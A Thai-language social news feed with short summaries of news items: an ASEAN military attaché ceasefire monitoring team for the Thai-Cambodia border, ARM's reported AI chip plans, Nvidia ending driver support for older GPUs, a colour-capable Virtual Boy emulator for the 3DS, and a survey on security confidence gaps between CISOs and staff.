• ผู้ช่วยทูตทหารอาเซียน ตั้งทีมติดตามหยุดยิง : [NEWS UPDATE]

    พล.ต.วินธัย สุวารี โฆษกกองทัพบก เผย กองทัพบกหารือกับผู้ช่วยทูตทหารอาเซียนประจำประเทศไทย เกี่ยวกับสถานการณ์ชายแดนไทย-กัมพูชา เห็นพ้องตั้งทีมเฝ้าติดตามชั่วคราวของทูตทหารจากชาติสมาชิกอาเซียนโดยเร่งด่วน เพื่อติดตามสถานการณ์และสร้างความไว้วางใจระหว่างทั้งสองฝ่าย รวมถึงหารือการตั้งกลไก ASEAN Monitoring Team(AMIT) ในอนาคต ทำหน้าที่หลักในการเฝ้าระวังสถานการณ์ โดยจะหารือในเวทีประชุมคณะกรรมการชายแดนทั่วไป(GBC) ระหว่างไทยกับกัมพูชา ในวันที่ 4 ส.ค. นี้ ยืนยัน จุดยืนไทยเคารพหลักสากล ไม่รุกราน ไม่ใช้ความรุนแรง

    -หวั่นล่ามล้วงข้อมูลไทย

    -เปลี่ยนสถานที่วัดใจกัมพูชา

    -เขมรฉวยจังหวะฟ้องโลก

    -ลดค่าไฟ กันยายน–ธันวาคม
    ผู้ช่วยทูตทหารอาเซียน ตั้งทีมติดตามหยุดยิง : [NEWS UPDATE] พล.ต.วินธัย สุวารี โฆษกกองทัพบก เผย กองทัพบกหารือกับผู้ช่วยทูตทหารอาเซียนประจำประเทศไทย เกี่ยวกับสถานการณ์ชายแดนไทย-กัมพูชา เห็นพ้องตั้งทีมเฝ้าติดตามชั่วคราวของทูตทหารจากชาติสมาชิกอาเซียนโดยเร่งด่วน เพื่อติดตามสถานการณ์และสร้างความไว้วางใจระหว่างทั้งสองฝ่าย รวมถึงหารือการตั้งกลไก ASEAN Monitoring Team(AMIT) ในอนาคต ทำหน้าที่หลักในการเฝ้าระวังสถานการณ์ โดยจะหารือในเวทีประชุมคณะกรรมการชายแดนทั่วไป(GBC) ระหว่างไทยกับกัมพูชา ในวันที่ 4 ส.ค. นี้ ยืนยัน จุดยืนไทยเคารพหลักสากล ไม่รุกราน ไม่ใช้ความรุนแรง -หวั่นล่ามล้วงข้อมูลไทย -เปลี่ยนสถานที่วัดใจกัมพูชา -เขมรฉวยจังหวะฟ้องโลก -ลดค่าไฟ กันยายน–ธันวาคม
    0 ความคิดเห็น 0 การแบ่งปัน 341 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากข่าว: ARM พลิกเกมจากเบื้องหลังสู่เวทีหน้าในตลาด AI

    ARM เคยเป็นผู้ให้สิทธิ์ใช้งานสถาปัตยกรรม CPU ให้กับบริษัทต่างๆ เช่น Apple, Qualcomm, NVIDIA และ AWS โดยไม่ผลิตชิปเอง แต่ในปี 2025 ARM ประกาศแผนใหม่—จะพัฒนา “Full-End Solutions” ด้วยตัวเอง ตั้งแต่ชิปเล็ก (chiplet) ไปจนถึงระบบคอมพิวเตอร์ครบชุด เพื่อรองรับความต้องการด้าน AI ที่เติบโตอย่างรวดเร็ว

    CEO ของ ARM, Rene Haas เผยว่า “เราไม่ใช่แค่จะออกแบบ แต่จะสร้างจริง” ซึ่งหมายถึงการลงทุนมหาศาลใน R&D การเลือกโรงงานผลิต และการจัดจำหน่าย ซึ่งอาจมีค่าใช้จ่ายสูงถึง $500 ล้านต่อชิปหนึ่งตัว

    แม้จะเสี่ยงต่อการสูญเสียลูกค้าเดิมที่อาจมองว่า ARM กลายเป็นคู่แข่ง แต่ ARM ก็มีจุดแข็งจากประสบการณ์และการยอมรับในตลาด โดยเฉพาะในกลุ่ม hyperscaler เช่น AWS, Google, Microsoft ที่ใช้ชิป Neoverse ของ ARM ในระบบ AI ของตน

    ARM เตรียมพัฒนา Full-End Solutions สำหรับตลาด AI
    รวมถึง chiplets, บอร์ด, และระบบคอมพิวเตอร์ครบชุด
    เปลี่ยนจากโมเดล IP licensing ไปสู่การผลิตจริง

    CEO Rene Haas ยืนยันการลงทุนใน R&D และการสร้างชิปเอง
    อาจมีค่าใช้จ่ายสูงถึง $500 ล้านต่อชิป
    ต้องเลือกโรงงานผลิตและจัดจำหน่ายเอง

    ARM มีฐานลูกค้าในตลาด AI ที่เติบโตอย่างรวดเร็ว
    Neoverse CPU ถูกใช้ใน AWS Graviton, Google Axion, Microsoft Cobalt
    คาดว่า 50% ของ CPU ใน data center จะใช้สถาปัตยกรรม ARM ภายในปีนี้

    SoftBank เป็นผู้ถือหุ้นใหญ่ของ ARM และมีประวัติการลงทุนในโครงการเสี่ยง
    เพิ่มความมั่นใจในการสนับสนุนแผนใหม่ของ ARM
    เคยลงทุนหลายพันล้านในเทคโนโลยีล้ำสมัย

    ARM ไม่ได้ตั้งใจเป็นผู้ผลิตชิปเต็มรูปแบบ แต่จะสร้าง prototype เพื่อเร่งนวัตกรรมของลูกค้า
    ใช้เป็นตัวอย่างเพื่อช่วยลูกค้าออกแบบชิปเฉพาะทาง
    เน้นตลาด AI inference และ data center

    https://wccftech.com/arm-is-reportedly-exploring-full-end-solutions-for-the-ai-market/
    🎙️ เรื่องเล่าจากข่าว: ARM พลิกเกมจากเบื้องหลังสู่เวทีหน้าในตลาด AI ARM เคยเป็นผู้ให้สิทธิ์ใช้งานสถาปัตยกรรม CPU ให้กับบริษัทต่างๆ เช่น Apple, Qualcomm, NVIDIA และ AWS โดยไม่ผลิตชิปเอง แต่ในปี 2025 ARM ประกาศแผนใหม่—จะพัฒนา “Full-End Solutions” ด้วยตัวเอง ตั้งแต่ชิปเล็ก (chiplet) ไปจนถึงระบบคอมพิวเตอร์ครบชุด เพื่อรองรับความต้องการด้าน AI ที่เติบโตอย่างรวดเร็ว CEO ของ ARM, Rene Haas เผยว่า “เราไม่ใช่แค่จะออกแบบ แต่จะสร้างจริง” ซึ่งหมายถึงการลงทุนมหาศาลใน R&D การเลือกโรงงานผลิต และการจัดจำหน่าย ซึ่งอาจมีค่าใช้จ่ายสูงถึง $500 ล้านต่อชิปหนึ่งตัว แม้จะเสี่ยงต่อการสูญเสียลูกค้าเดิมที่อาจมองว่า ARM กลายเป็นคู่แข่ง แต่ ARM ก็มีจุดแข็งจากประสบการณ์และการยอมรับในตลาด โดยเฉพาะในกลุ่ม hyperscaler เช่น AWS, Google, Microsoft ที่ใช้ชิป Neoverse ของ ARM ในระบบ AI ของตน ✅ ARM เตรียมพัฒนา Full-End Solutions สำหรับตลาด AI ➡️ รวมถึง chiplets, บอร์ด, และระบบคอมพิวเตอร์ครบชุด ➡️ เปลี่ยนจากโมเดล IP licensing ไปสู่การผลิตจริง ✅ CEO Rene Haas ยืนยันการลงทุนใน R&D และการสร้างชิปเอง ➡️ อาจมีค่าใช้จ่ายสูงถึง $500 ล้านต่อชิป ➡️ ต้องเลือกโรงงานผลิตและจัดจำหน่ายเอง ✅ ARM มีฐานลูกค้าในตลาด AI ที่เติบโตอย่างรวดเร็ว ➡️ Neoverse CPU ถูกใช้ใน AWS Graviton, Google Axion, Microsoft Cobalt ➡️ คาดว่า 50% ของ CPU ใน data center จะใช้สถาปัตยกรรม ARM ภายในปีนี้ ✅ SoftBank เป็นผู้ถือหุ้นใหญ่ของ ARM และมีประวัติการลงทุนในโครงการเสี่ยง ➡️ เพิ่มความมั่นใจในการสนับสนุนแผนใหม่ของ ARM ➡️ เคยลงทุนหลายพันล้านในเทคโนโลยีล้ำสมัย ✅ ARM ไม่ได้ตั้งใจเป็นผู้ผลิตชิปเต็มรูปแบบ แต่จะสร้าง prototype เพื่อเร่งนวัตกรรมของลูกค้า ➡️ ใช้เป็นตัวอย่างเพื่อช่วยลูกค้าออกแบบชิปเฉพาะทาง ➡️ เน้นตลาด AI inference และ data center https://wccftech.com/arm-is-reportedly-exploring-full-end-solutions-for-the-ai-market/
    WCCFTECH.COM
    ARM Is Reportedly Exploring "Full-End" Solutions for the AI Market, Marking a Major Pivot from CPU IP Licensing to Competing with Mainstream Players Like AMD & Intel
    ARM is expected to make a pivot towards full-end solutions for its customers, creating its own chips to compete with Intel and AMD.
    0 ความคิดเห็น 0 การแบ่งปัน 121 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: Nvidia ปิดฉากการ์ดจอรุ่นเก๋า พร้อมส่งท้ายด้วยอัปเดตความปลอดภัย 3 ปี

    หลังจากให้บริการมานานกว่า 9–11 ปี Nvidia ประกาศว่า GPU ตระกูล Maxwell (GTX 900), Pascal (GTX 10) และ Volta (Titan V) จะได้รับไดรเวอร์ Game Ready ครั้งสุดท้ายในเดือนตุลาคม 2025 จากนั้นจะเปลี่ยนไปให้ “อัปเดตด้านความปลอดภัยรายไตรมาส” จนถึงตุลาคม 2028

    แม้จะไม่มีการปรับแต่งประสิทธิภาพหรือรองรับเกมใหม่อีกต่อไป แต่ผู้ใช้ยังสามารถเล่นเกมเดิมได้ตามปกติ หากเกมนั้นไม่ต้องการฟีเจอร์ใหม่อย่าง ray tracing หรือ DLSS ซึ่ง GPU รุ่นเก่าไม่รองรับอยู่แล้ว

    Nvidia ยังประกาศว่าจะขยายการสนับสนุน Game Ready บน Windows 10 สำหรับ GPU ตระกูล RTX ไปจนถึงตุลาคม 2026 แม้ Microsoft จะหยุดสนับสนุน Windows 10 ในเดือนตุลาคม 2025 ก็ตาม

    Nvidia จะหยุดออกไดรเวอร์ Game Ready สำหรับ GPU Maxwell, Pascal และ Volta ในเดือนตุลาคม 2025
    การ์ดจอที่ได้รับผลกระทบ ได้แก่ GTX 900, GTX 10 และ Titan V
    จะยังได้รับอัปเดตด้านความปลอดภัยรายไตรมาสไปจนถึงตุลาคม 2028

    การ์ดจอรุ่นเก่าเหล่านี้จะยังสามารถเล่นเกมได้ หากไม่ต้องการฟีเจอร์ใหม่
    เช่น ray tracing หรือ DLSS ที่เริ่มมีในสถาปัตยกรรม Turing เป็นต้นไป
    เกมเก่าและเกมที่ไม่ใช้ฟีเจอร์ใหม่ยังสามารถรันได้ตามปกติ

    Nvidia จะยังสนับสนุน Game Ready บน Windows 10 สำหรับ RTX GPU ไปจนถึงตุลาคม 2026
    เป็นการขยายเวลาหลังจาก Microsoft หยุดสนับสนุน Windows 10 ในตุลาคม 2025
    ช่วยให้ผู้ใช้มีเวลาวางแผนอัปเกรดระบบ

    GPU Maxwell เปิดตัวในปี 2014 และ Pascal ในปี 2016 ถือว่าได้รับการสนับสนุนยาวนานถึง 11 ปี
    เกินมาตรฐานอุตสาหกรรมทั่วไป
    GTX 1060 ยังติดอันดับการ์ดจอยอดนิยมใน Steam Survey ปี 2025

    ผู้ใช้ Pascal ยังสามารถใช้ Intel XeSS DP4a สำหรับการอัปสเกลภาพในบางเกมได้
    เป็นทางเลือกแทน DLSS ที่ไม่รองรับบน GPU รุ่นเก่า
    ช่วยยืดอายุการใช้งานในเกมที่รองรับ

    หลังตุลาคม 2025 จะไม่มีการปรับแต่งประสิทธิภาพหรือแก้บั๊กสำหรับเกมใหม่อีกต่อไป
    เกมใหม่อาจรันได้ไม่ดี หรือไม่เสถียรบน GPU Maxwell/Pascal
    ไม่มีการเพิ่มฟีเจอร์ใหม่หรือรองรับเทคโนโลยีล่าสุด

    GPU รุ่นเก่าไม่รองรับ DLSS หรือ ray tracing ซึ่งกลายเป็นมาตรฐานในเกม AAA ยุคใหม่
    ทำให้ภาพและประสิทธิภาพด้อยกว่าการ์ดรุ่นใหม่
    อาจไม่สามารถเล่นเกมที่บังคับใช้ฟีเจอร์เหล่านี้ได้เลย

    Windows 10 จะหยุดรับการอัปเดตจาก Microsoft ในตุลาคม 2025
    แม้ Nvidia จะขยายการสนับสนุนไปถึง 2026 แต่ระบบปฏิบัติการจะไม่มีฟีเจอร์ใหม่หรือแพตช์จาก Microsoft
    เสี่ยงต่อช่องโหว่ด้านความปลอดภัยในระดับระบบ

    ผู้ใช้ที่ยังใช้ GPU รุ่นเก่าอาจต้องวางแผนอัปเกรดในอีกไม่กี่ปีข้างหน้า
    หากต้องการเล่นเกมใหม่หรือใช้งานฟีเจอร์ AI เช่น DLSS 4
    การ์ดรุ่นใหม่อาจมีข้อกำหนดด้านระบบที่ต้องใช้ Windows 11

    https://www.tomshardware.com/pc-components/gpus/nvidia-confirms-end-of-game-ready-driver-support-for-maxwell-and-pascal-gpus-affected-products-will-get-optimized-drivers-through-october-2025
    🎙️ เรื่องเล่าจากข่าว: Nvidia ปิดฉากการ์ดจอรุ่นเก๋า พร้อมส่งท้ายด้วยอัปเดตความปลอดภัย 3 ปี หลังจากให้บริการมานานกว่า 9–11 ปี Nvidia ประกาศว่า GPU ตระกูล Maxwell (GTX 900), Pascal (GTX 10) และ Volta (Titan V) จะได้รับไดรเวอร์ Game Ready ครั้งสุดท้ายในเดือนตุลาคม 2025 จากนั้นจะเปลี่ยนไปให้ “อัปเดตด้านความปลอดภัยรายไตรมาส” จนถึงตุลาคม 2028 แม้จะไม่มีการปรับแต่งประสิทธิภาพหรือรองรับเกมใหม่อีกต่อไป แต่ผู้ใช้ยังสามารถเล่นเกมเดิมได้ตามปกติ หากเกมนั้นไม่ต้องการฟีเจอร์ใหม่อย่าง ray tracing หรือ DLSS ซึ่ง GPU รุ่นเก่าไม่รองรับอยู่แล้ว Nvidia ยังประกาศว่าจะขยายการสนับสนุน Game Ready บน Windows 10 สำหรับ GPU ตระกูล RTX ไปจนถึงตุลาคม 2026 แม้ Microsoft จะหยุดสนับสนุน Windows 10 ในเดือนตุลาคม 2025 ก็ตาม ✅ Nvidia จะหยุดออกไดรเวอร์ Game Ready สำหรับ GPU Maxwell, Pascal และ Volta ในเดือนตุลาคม 2025 ➡️ การ์ดจอที่ได้รับผลกระทบ ได้แก่ GTX 900, GTX 10 และ Titan V ➡️ จะยังได้รับอัปเดตด้านความปลอดภัยรายไตรมาสไปจนถึงตุลาคม 2028 ✅ การ์ดจอรุ่นเก่าเหล่านี้จะยังสามารถเล่นเกมได้ หากไม่ต้องการฟีเจอร์ใหม่ ➡️ เช่น ray tracing หรือ DLSS ที่เริ่มมีในสถาปัตยกรรม Turing เป็นต้นไป ➡️ เกมเก่าและเกมที่ไม่ใช้ฟีเจอร์ใหม่ยังสามารถรันได้ตามปกติ ✅ Nvidia จะยังสนับสนุน Game Ready บน Windows 10 สำหรับ RTX GPU ไปจนถึงตุลาคม 2026 ➡️ เป็นการขยายเวลาหลังจาก Microsoft หยุดสนับสนุน Windows 10 ในตุลาคม 2025 ➡️ ช่วยให้ผู้ใช้มีเวลาวางแผนอัปเกรดระบบ ✅ GPU Maxwell เปิดตัวในปี 2014 และ Pascal ในปี 2016 ถือว่าได้รับการสนับสนุนยาวนานถึง 11 ปี ➡️ เกินมาตรฐานอุตสาหกรรมทั่วไป ➡️ GTX 1060 ยังติดอันดับการ์ดจอยอดนิยมใน Steam Survey ปี 2025 ✅ ผู้ใช้ Pascal ยังสามารถใช้ Intel XeSS DP4a สำหรับการอัปสเกลภาพในบางเกมได้ ➡️ เป็นทางเลือกแทน DLSS ที่ไม่รองรับบน GPU รุ่นเก่า ➡️ ช่วยยืดอายุการใช้งานในเกมที่รองรับ ‼️ หลังตุลาคม 2025 จะไม่มีการปรับแต่งประสิทธิภาพหรือแก้บั๊กสำหรับเกมใหม่อีกต่อไป ⛔ เกมใหม่อาจรันได้ไม่ดี หรือไม่เสถียรบน GPU Maxwell/Pascal ⛔ ไม่มีการเพิ่มฟีเจอร์ใหม่หรือรองรับเทคโนโลยีล่าสุด ‼️ GPU รุ่นเก่าไม่รองรับ DLSS หรือ ray tracing ซึ่งกลายเป็นมาตรฐานในเกม AAA ยุคใหม่ ⛔ ทำให้ภาพและประสิทธิภาพด้อยกว่าการ์ดรุ่นใหม่ ⛔ อาจไม่สามารถเล่นเกมที่บังคับใช้ฟีเจอร์เหล่านี้ได้เลย ‼️ Windows 10 จะหยุดรับการอัปเดตจาก Microsoft ในตุลาคม 2025 ⛔ แม้ Nvidia จะขยายการสนับสนุนไปถึง 2026 แต่ระบบปฏิบัติการจะไม่มีฟีเจอร์ใหม่หรือแพตช์จาก Microsoft ⛔ เสี่ยงต่อช่องโหว่ด้านความปลอดภัยในระดับระบบ ‼️ ผู้ใช้ที่ยังใช้ GPU รุ่นเก่าอาจต้องวางแผนอัปเกรดในอีกไม่กี่ปีข้างหน้า ⛔ หากต้องการเล่นเกมใหม่หรือใช้งานฟีเจอร์ AI เช่น DLSS 4 ⛔ การ์ดรุ่นใหม่อาจมีข้อกำหนดด้านระบบที่ต้องใช้ Windows 11 https://www.tomshardware.com/pc-components/gpus/nvidia-confirms-end-of-game-ready-driver-support-for-maxwell-and-pascal-gpus-affected-products-will-get-optimized-drivers-through-october-2025
    0 ความคิดเห็น 0 การแบ่งปัน 87 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: Virtual Boy กลับมาในสีสันสดใส บน 3DS ผ่านอีมูเลเตอร์ Red Viper

    ย้อนกลับไปเมื่อปี 1995 Nintendo เปิดตัว Virtual Boy เครื่องเกมพกพาแบบ VR ที่ใช้จอ LED สีแดงสองจอเพื่อสร้างภาพสามมิติ แม้จะล้ำยุค แต่ก็ล้มเหลวอย่างรวดเร็วเพราะภาพสีแดง-ดำที่ทำให้ผู้เล่นปวดหัว และข้อจำกัดด้านการพกพา

    แต่ในปี 2025 นี้ Red Viper—a Virtual Boy emulator สำหรับ 3DS—ได้ออกเวอร์ชัน 1.0 เพื่อฉลองครบรอบ 30 ปีของเครื่องเกมนี้ โดยเพิ่มฟีเจอร์ใหม่ที่เปลี่ยนประสบการณ์เดิมให้สดใสขึ้น:
    - รองรับการปรับแต่งสีได้ถึง 4 ระดับ
    - เล่นเกมได้เต็มความเร็วทุกเกม
    - รองรับ Circle Pad Pro และการควบคุมแบบใหม่
    - ใช้จอ 3DS แบบ glasses-free เพื่อสร้างภาพสามมิติที่ใกล้เคียงต้นฉบับ

    ผู้ใช้สามารถเลือกสีใหม่ผ่านหน้าจอสัมผัส และบันทึกพาเลตต์เฉพาะสำหรับแต่ละเกมได้ ทำให้เกมอย่าง Red Alarm หรือ Wario Land ดูมีชีวิตชีวาขึ้นอย่างเห็นได้ชัด

    Red Viper เวอร์ชัน 1.0 เปิดตัวบน 3DS เพื่อฉลองครบรอบ 30 ปีของ Virtual Boy
    รองรับการเล่นเกมทุกเกมอย่างเต็มความเร็ว
    ใช้จอ 3DS เพื่อจำลองภาพสามมิติแบบต้นฉบับ

    เพิ่มฟีเจอร์ปรับแต่งสีแบบเต็มรูปแบบ
    ผู้เล่นสามารถเลือกสีได้ 4 ระดับ: Darkest, Dark, Light, Lightest
    ปรับความสว่างและความอิ่มสีได้ผ่านหน้าจอสัมผัส

    รองรับการควบคุมใหม่ เช่น Circle Pad Pro และการแมปปุ่มแบบกำหนดเอง
    เพิ่มความสะดวกในการเล่นเกมที่ต้องการความแม่นยำ
    รองรับการบันทึกสถานะเกมและเซฟไฟล์

    สามารถติดตั้งผ่าน Universal Updater หรือ GitHub สำหรับผู้ใช้ 3DS ที่ติดตั้ง custom firmware แล้ว
    ต้องมี ROM ของ Virtual Boy ที่ถูกต้องตามกฎหมาย
    รองรับการสร้าง “forwarder” เพื่อให้เกมปรากฏบนเมนูหลักของ 3DS

    มีการปรับปรุงประสิทธิภาพ เช่น double buffering และ interrupt prediction
    ลดการกระตุกและปรับความเร็วให้ใกล้เคียงเครื่องจริง
    แก้บั๊กในเกมอย่าง Space Invaders และ Golf

    Virtual Boy มีเกมเพียง 22 เกม และถูกยกเลิกภายใน 1 ปีหลังเปิดตัว
    เป็นหนึ่งในผลิตภัณฑ์ที่ล้มเหลวที่สุดของ Nintendo
    แต่กลายเป็นของสะสมที่หายากในหมู่แฟนเกม

    Red Viper เป็นอีมูเลเตอร์ที่แม่นยำที่สุดสำหรับ Virtual Boy บนทุกแพลตฟอร์ม
    รองรับการจำลองเวลา render และเสียงแบบต้นฉบับ
    มีโหมด anaglyph สำหรับผู้ใช้ 2DS ที่ไม่มีจอสามมิติ

    การเพิ่มสีช่วยให้เกม Virtual Boy เล่นง่ายขึ้นและดูมีชีวิตชีวา
    เช่น การใช้สีเหลือง-เขียวเพื่อแยกศัตรูออกจากฉากหลัง
    ช่วยให้เกมอย่าง Red Alarm และ Jack Bros. เล่นสนุกขึ้นมาก

    ยังมีอีมูเลเตอร์ Virtual Boy สำหรับ Meta Quest และ Apple Vision Pro
    ให้ประสบการณ์ VR ที่ใกล้เคียงต้นฉบับมากขึ้น
    เหมาะสำหรับผู้ที่ต้องการเล่นในรูปแบบ immersive

    ต้องใช้เครื่อง 3DS ที่ติดตั้ง custom firmware เท่านั้น
    ไม่สามารถใช้งานบนเครื่องที่ไม่ได้เจลเบรก
    อาจมีความเสี่ยงด้านความปลอดภัยหากติดตั้งผิดวิธี

    ผู้ใช้ต้องหา ROM ด้วยตนเอง ซึ่งอาจมีข้อกฎหมายเกี่ยวกับลิขสิทธิ์
    การดาวน์โหลด ROM โดยไม่ได้เป็นเจ้าของอาจผิดกฎหมาย
    ควรใช้เฉพาะ ROM ที่ได้จากการสำรองข้อมูลของตนเอง

    ไม่มีพาเลตต์สีสำเร็จรูป ต้องปรับแต่งเองในแต่ละเกม
    อาจต้องใช้เวลาในการทดลองเพื่อให้ได้ภาพที่สวยงาม
    หากไม่บันทึกพาเลตต์ อาจต้องตั้งค่าใหม่ทุกครั้ง

    ภาพที่ได้อาจไม่ตรงกับศิลปะต้นฉบับของเกม 8-bit หรือ pixel art
    สีที่เลือกอาจทำให้ภาพดูผิดเพี้ยนจากต้นฉบับ
    ต้องเลือกสีอย่างระมัดระวังเพื่อไม่ให้เสียอรรถรส

    https://www.techspot.com/news/108892-30-years-later-virtual-boy-games-finally-playable.html
    🎮 เรื่องเล่าจากข่าว: Virtual Boy กลับมาในสีสันสดใส บน 3DS ผ่านอีมูเลเตอร์ Red Viper ย้อนกลับไปเมื่อปี 1995 Nintendo เปิดตัว Virtual Boy เครื่องเกมพกพาแบบ VR ที่ใช้จอ LED สีแดงสองจอเพื่อสร้างภาพสามมิติ แม้จะล้ำยุค แต่ก็ล้มเหลวอย่างรวดเร็วเพราะภาพสีแดง-ดำที่ทำให้ผู้เล่นปวดหัว และข้อจำกัดด้านการพกพา แต่ในปี 2025 นี้ Red Viper—a Virtual Boy emulator สำหรับ 3DS—ได้ออกเวอร์ชัน 1.0 เพื่อฉลองครบรอบ 30 ปีของเครื่องเกมนี้ โดยเพิ่มฟีเจอร์ใหม่ที่เปลี่ยนประสบการณ์เดิมให้สดใสขึ้น: - รองรับการปรับแต่งสีได้ถึง 4 ระดับ - เล่นเกมได้เต็มความเร็วทุกเกม - รองรับ Circle Pad Pro และการควบคุมแบบใหม่ - ใช้จอ 3DS แบบ glasses-free เพื่อสร้างภาพสามมิติที่ใกล้เคียงต้นฉบับ ผู้ใช้สามารถเลือกสีใหม่ผ่านหน้าจอสัมผัส และบันทึกพาเลตต์เฉพาะสำหรับแต่ละเกมได้ ทำให้เกมอย่าง Red Alarm หรือ Wario Land ดูมีชีวิตชีวาขึ้นอย่างเห็นได้ชัด ✅ Red Viper เวอร์ชัน 1.0 เปิดตัวบน 3DS เพื่อฉลองครบรอบ 30 ปีของ Virtual Boy ➡️ รองรับการเล่นเกมทุกเกมอย่างเต็มความเร็ว ➡️ ใช้จอ 3DS เพื่อจำลองภาพสามมิติแบบต้นฉบับ ✅ เพิ่มฟีเจอร์ปรับแต่งสีแบบเต็มรูปแบบ ➡️ ผู้เล่นสามารถเลือกสีได้ 4 ระดับ: Darkest, Dark, Light, Lightest ➡️ ปรับความสว่างและความอิ่มสีได้ผ่านหน้าจอสัมผัส ✅ รองรับการควบคุมใหม่ เช่น Circle Pad Pro และการแมปปุ่มแบบกำหนดเอง ➡️ เพิ่มความสะดวกในการเล่นเกมที่ต้องการความแม่นยำ ➡️ รองรับการบันทึกสถานะเกมและเซฟไฟล์ ✅ สามารถติดตั้งผ่าน Universal Updater หรือ GitHub สำหรับผู้ใช้ 3DS ที่ติดตั้ง custom firmware แล้ว ➡️ ต้องมี ROM ของ Virtual Boy ที่ถูกต้องตามกฎหมาย ➡️ รองรับการสร้าง “forwarder” เพื่อให้เกมปรากฏบนเมนูหลักของ 3DS ✅ มีการปรับปรุงประสิทธิภาพ เช่น double buffering และ interrupt prediction ➡️ ลดการกระตุกและปรับความเร็วให้ใกล้เคียงเครื่องจริง ➡️ แก้บั๊กในเกมอย่าง Space Invaders และ Golf ✅ Virtual Boy มีเกมเพียง 22 เกม และถูกยกเลิกภายใน 1 ปีหลังเปิดตัว ➡️ เป็นหนึ่งในผลิตภัณฑ์ที่ล้มเหลวที่สุดของ Nintendo ➡️ แต่กลายเป็นของสะสมที่หายากในหมู่แฟนเกม ✅ Red Viper เป็นอีมูเลเตอร์ที่แม่นยำที่สุดสำหรับ Virtual Boy บนทุกแพลตฟอร์ม ➡️ รองรับการจำลองเวลา render และเสียงแบบต้นฉบับ ➡️ มีโหมด anaglyph สำหรับผู้ใช้ 2DS ที่ไม่มีจอสามมิติ ✅ การเพิ่มสีช่วยให้เกม Virtual Boy เล่นง่ายขึ้นและดูมีชีวิตชีวา ➡️ เช่น การใช้สีเหลือง-เขียวเพื่อแยกศัตรูออกจากฉากหลัง ➡️ ช่วยให้เกมอย่าง Red Alarm และ Jack Bros. เล่นสนุกขึ้นมาก ✅ ยังมีอีมูเลเตอร์ Virtual Boy สำหรับ Meta Quest และ Apple Vision Pro ➡️ ให้ประสบการณ์ VR ที่ใกล้เคียงต้นฉบับมากขึ้น ➡️ เหมาะสำหรับผู้ที่ต้องการเล่นในรูปแบบ immersive ‼️ ต้องใช้เครื่อง 3DS ที่ติดตั้ง custom firmware เท่านั้น ⛔ ไม่สามารถใช้งานบนเครื่องที่ไม่ได้เจลเบรก ⛔ อาจมีความเสี่ยงด้านความปลอดภัยหากติดตั้งผิดวิธี ‼️ ผู้ใช้ต้องหา ROM ด้วยตนเอง ซึ่งอาจมีข้อกฎหมายเกี่ยวกับลิขสิทธิ์ ⛔ การดาวน์โหลด ROM โดยไม่ได้เป็นเจ้าของอาจผิดกฎหมาย ⛔ ควรใช้เฉพาะ ROM ที่ได้จากการสำรองข้อมูลของตนเอง ‼️ ไม่มีพาเลตต์สีสำเร็จรูป ต้องปรับแต่งเองในแต่ละเกม ⛔ อาจต้องใช้เวลาในการทดลองเพื่อให้ได้ภาพที่สวยงาม ⛔ หากไม่บันทึกพาเลตต์ อาจต้องตั้งค่าใหม่ทุกครั้ง ‼️ ภาพที่ได้อาจไม่ตรงกับศิลปะต้นฉบับของเกม 8-bit หรือ pixel art ⛔ สีที่เลือกอาจทำให้ภาพดูผิดเพี้ยนจากต้นฉบับ ⛔ ต้องเลือกสีอย่างระมัดระวังเพื่อไม่ให้เสียอรรถรส https://www.techspot.com/news/108892-30-years-later-virtual-boy-games-finally-playable.html
    WWW.TECHSPOT.COM
    30 years later, Virtual Boy games are finally playable in color
    Nintendo 3DS owners who install custom firmware can now play Virtual Boy games in colors other than black and red. The functionality comes with a significant update...
    0 ความคิดเห็น 0 การแบ่งปัน 125 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ช่องว่างแห่งความมั่นใจ” ที่อาจทำให้องค์กรพังโดยไม่รู้ตัว

    รายงานจาก Bitdefender และ Darktrace ในปี 2025 เผยให้เห็นช่องว่างความเข้าใจระหว่างผู้บริหารด้านความปลอดภัย (CISO) กับทีมปฏิบัติการด้านไซเบอร์ (security practitioners) อย่างชัดเจน

    - 45% ของ CISO เชื่อว่าระบบขององค์กรสามารถรับมือกับภัยคุกคามได้ดี
    - แต่มีเพียง 19% ของผู้จัดการระดับกลางที่เห็นด้วย
    - และเมื่อพูดถึงภัยจาก AI มีถึง 62% ของผู้บริหารที่มั่นใจว่าจะรับมือได้ แต่ทีมปฏิบัติการกลับมั่นใจแค่ 49%

    เหตุผลหลักคือ ผู้บริหารมักดูข้อมูลจาก dashboard และรายงานสรุป ในขณะที่ทีมปฏิบัติการต้องรับมือกับความจริงที่ซับซ้อน เช่น ระบบเก่า, การแจ้งเตือนล้นระบบ, และการขาดทรัพยากร

    ผลที่ตามมาคือการลงทุนผิดจุด เช่น เน้น compliance มากกว่าการพัฒนาเครื่องมือรับมือภัยจริง และการประเมินความเสี่ยงที่ไม่ตรงกับความเป็นจริง

    CISO มั่นใจในความปลอดภัยขององค์กรมากกว่าทีมปฏิบัติการอย่างมีนัยสำคัญ
    45% ของผู้บริหารมั่นใจเทียบกับ 19% ของผู้จัดการระดับกลาง
    ช่องว่างนี้ส่งผลต่อการจัดลำดับความสำคัญในการลงทุน

    ภัยคุกคามจาก AI ถูกประเมินต่ำเกินไปโดยผู้บริหาร
    62% ของผู้บริหารมั่นใจว่าจะรับมือได้
    แต่ทีมปฏิบัติการเห็นว่าระบบยังไม่พร้อม และขาดความเข้าใจใน AI

    ทีมปฏิบัติการเผชิญกับความเครียดจากการแจ้งเตือนล้นระบบและเครื่องมือที่ไม่เชื่อมโยงกัน
    ทำให้มองเห็นปัญหาที่ผู้บริหารไม่เคยสัมผัส
    เช่น legacy systems, alert fatigue, และ policy ที่ไม่สอดคล้องกัน

    การลงทุนมักเน้น compliance และ visibility มากกว่าการพัฒนา core capabilities
    เช่น detection engineering, incident response, threat containment
    ส่งผลให้ระบบไม่พร้อมรับมือภัยจริง

    Darktrace พบว่า 78% ของ CISO เห็นว่า AI มีผลกระทบต่อองค์กรอย่างมาก
    แต่มีเพียง 42% ของผู้ปฏิบัติการที่เข้าใจว่า AI ในระบบคืออะไร
    ช่องว่างความรู้ทำให้การใช้ AI เพื่อป้องกันภัยยังไม่เต็มประสิทธิภาพ

    https://www.csoonline.com/article/4031648/mind-the-overconfidence-gap-cisos-and-staff-dont-see-eye-to-eye-on-security-posture.html
